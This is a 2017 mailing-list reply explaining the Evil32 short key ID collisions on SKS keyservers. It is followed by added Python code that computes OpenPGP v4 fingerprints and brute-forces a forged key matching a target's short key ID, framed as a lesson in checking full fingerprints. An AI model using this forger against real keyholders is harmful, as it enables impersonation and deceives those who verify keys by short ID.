suspicious key found

Andrew Gallagher andrewg at andrewg.com
Tue May 16 17:28:23 CEST 2017


On 2017/05/16 14:47, Janne Inkilä wrote:
> Did someone really generate a same-looking key? And why? Any ideas?

Yes, they did. Most of the strong set was duplicated by the Evil32
project in order to demonstrate the danger of relying on short key IDs
(because on modern hardware it takes mere seconds to generate a fake key
with the same short ID). Unfortunately the fake keys got uploaded to an
SKS server and polluted the database. The authors then mass-revoked all
the offending keys, but since SKS is append-only they still appear in
search results.

https://evil32.com/

The fact that invalid (even suspicious) keys exist on the SKS servers
(or anywhere on the internet for that matter) is in itself not a problem
- any decent public-key infrastructure must be designed under the
assumption that forgeries are inevitable and use some other method
(signatures, out of band verification) to determine the validity of keys.

The moral of the story is: don't believe everything you see on the
internet. ;-)

Andrew.

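To make the mechanism in the reply above concrete, here is an added example (mine, not the post author's and not the Evil32 project's code) that builds a v4 RSA public-key packet, derives its fingerprint and 64-bit / 32-bit key IDs exactly as RFC 4880 specifies, and then brute-forces a second key whose low bits of fingerprint collide by varying nothing but the creation timestamp. The RSA moduli are constructed placeholders (not real keys) and the collision width is a parameter, since a full 32-bit match is about 2^32 SHA-1 calls: seconds on a GPU, as the post says, but too slow for a pure-Python demo.

```python
# Added example (not from the post or the Evil32 project): how an OpenPGP v4
# fingerprint and its key IDs are derived, and why the 32-bit short ID can be
# collided by brute force. The moduli are constructed placeholders, not real
# RSA keys, and the search width is a parameter so the demo finishes quickly.
import hashlib
import struct


def mpi(value: int) -> bytes:
    """OpenPGP MPI (RFC 4880 3.2): 2-octet bit count, then big-endian magnitude."""
    nbytes = (value.bit_length() + 7) // 8
    return struct.pack(">H", value.bit_length()) + value.to_bytes(nbytes, "big")


def v4_public_key_body(created: int, n: int, e: int) -> bytes:
    """Body of a v4 RSA public-key packet (RFC 4880 5.5.2):
    version 4, 4-octet creation time, algorithm 1 (RSA), MPIs n and e."""
    return b"\x04" + struct.pack(">I", created) + b"\x01" + mpi(n) + mpi(e)


def v4_fingerprint(body: bytes) -> bytes:
    """v4 fingerprint (RFC 4880 12.2): SHA-1 over 0x99, 2-octet body length, body."""
    return hashlib.sha1(b"\x99" + struct.pack(">H", len(body)) + body).digest()


def long_key_id(fpr: bytes) -> str:
    """64-bit key ID: the low 8 octets of the fingerprint."""
    return fpr[-8:].hex().upper()


def short_key_id(fpr: bytes) -> str:
    """32-bit short key ID: the low 4 octets (what --keyid-format short prints)."""
    return fpr[-4:].hex().upper()


def low_bits(fpr: bytes, bits: int) -> int:
    """The low `bits` bits of the fingerprint (bits=32 is the short ID as an integer)."""
    return int.from_bytes(fpr[-4:], "big") & ((1 << bits) - 1)


def forge_short_id(target_fpr, attacker_n, attacker_e, bits=32, start=0, max_tries=1 << 24):
    """Vary only the creation timestamp of the attacker's own RSA key until the
    low `bits` bits of its fingerprint equal the target's.

    The key material is untouched, so the forged key is fully usable by the
    attacker. Expected cost is about 2**bits SHA-1 evaluations: ~4.3e9 for the
    real 32-bit short ID. `start` lets the attacker pick plausible-looking
    timestamps. Returns (created, fingerprint, tries), or None if max_tries runs out.
    """
    want = low_bits(target_fpr, bits)
    tail = b"\x01" + mpi(attacker_n) + mpi(attacker_e)          # constant per key
    header = b"\x99" + struct.pack(">H", 1 + 4 + len(tail)) + b"\x04"
    for i in range(max_tries):
        created = (start + i) & 0xFFFFFFFF
        # Same bytes v4_fingerprint() would hash, with the prefix precomputed.
        fpr = hashlib.sha1(header + struct.pack(">I", created) + tail).digest()
        if low_bits(fpr, bits) == want:
            return created, fpr, i + 1
    return None


def placeholder_modulus(label: bytes, bits: int = 2048) -> int:
    """Deterministic odd integer with the top bit set. NOT a real RSA modulus;
    it only gives the packet a realistic size. (Constructed for this example.)"""
    stream = b"".join(
        hashlib.sha512(label + i.to_bytes(4, "big")).digest() for i in range(bits // 512)
    )
    return int.from_bytes(stream, "big") | (1 << (bits - 1)) | 1


E = 65537
VICTIM_N = placeholder_modulus(b"victim")
ATTACKER_N = placeholder_modulus(b"attacker")
VICTIM_FPR = v4_fingerprint(v4_public_key_body(1494947303, VICTIM_N, E))  # 2017-05-16


def demo(bits: int = 20):
    """Forge a key sharing the victim's low `bits` bits; 20 bits takes a few seconds."""
    found = forge_short_id(VICTIM_FPR, ATTACKER_N, E, bits=bits)
    assert found is not None, "raise max_tries"
    created, fpr, tries = found
    print(f"victim fpr {VICTIM_FPR.hex().upper()}  short {short_key_id(VICTIM_FPR)}")
    print(f"forged fpr {fpr.hex().upper()}  short {short_key_id(fpr)}"
          f"  (created={created}, {tries} tries)")
    print("low bits match:", low_bits(fpr, bits) == low_bits(VICTIM_FPR, bits))
    print("full fingerprints equal:", fpr == VICTIM_FPR)  # always False
    return found


if __name__ == "__main__":
    demo()
```

The point of the last two lines of `demo()` is the practical check: a key found on a keyserver should be matched against the full 160-bit fingerprint obtained out of band (or against a signature chain you already trust), never against the 32-bit short ID and, given the same search scaled up, not the 64-bit long ID either. The `placeholder_modulus` values are hypothetical; swapping in a real public key's `n` and `e` changes nothing about the search.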